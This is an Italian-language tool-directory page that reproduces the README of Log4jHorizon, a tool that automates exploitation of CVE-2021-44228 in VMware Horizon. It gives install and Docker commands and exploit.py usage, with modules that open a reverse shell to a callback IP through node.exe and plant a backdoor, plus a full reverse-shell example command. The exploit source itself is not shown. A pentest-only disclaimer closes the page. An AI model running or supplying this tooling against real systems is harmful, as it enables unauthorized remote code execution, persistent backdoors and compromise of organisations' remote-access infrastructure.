Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/puzzlepeaches/log4jhorizon
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

Sfruttando CVE-2021-44228 in VMWare Horizon per l'esecuzione remota di codice e altro.

Vedi Repository
12013174 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4jHorizon

Sfruttamento di CVE-2021-44228 in VMWare Horizon per l'esecuzione remota di codice e altro.

  • Crossing the Log4j Horizon - A Vulnerability With No Return

Il codice e il README.md questa volta sono un po' sparsi. Aggiornamenti in arrivo!

Perché?

Le proof of concept per questa vulnerabilità sono sparse e devono essere eseguite manualmente. Questo repository automatizza il processo di sfruttamento. Consulta il post del blog sopra per indicazioni sulla post-esplorazione.

Installazione

Questo repository può essere utilizzato manualmente o con Docker.

Installazione manuale

Per scaricare ed eseguire l'exploit manualmente, esegui i seguenti passaggi. Innanzitutto, assicurati che Java e Maven siano installati sul tuo host attaccante. Per farlo usando apt su sistemi operativi basati su Debian, esegui il seguente comando:

apt update && apt install openjdk-11-jre maven

Clona il repository GitHub e installa tutti i requisiti Python:

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Dalla radice del repository Log4jHorizon, compila il progetto Rogue-Jndi usando il comando seguente:

mvn package -f utils/rogue-jndi/

Installazione con Docker

Innanzitutto, assicurati che Docker sia installato sul tuo host attaccante. (Non ti guiderò passo passo su come farlo)

Successivamente, esegui il seguente comando per clonare il repository e creare l'immagine Docker che useremo.

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

Per eseguire il container, esegui un comando simile al seguente con i tuoi flag da riga di comando aggiunti. Nota che il container non catturerà una reverse shell. Devi creare un listener ncat in una sessione di shell separata:

docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

Utilizzo

usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

Esempi

Ottieni una reverse shell usando lo strumento installato sul tuo sistema locale:

python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

Disclaimer

Questo strumento è progettato per l'uso durante test di penetrazione; l'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio di questo programma.

Scarica lo strumento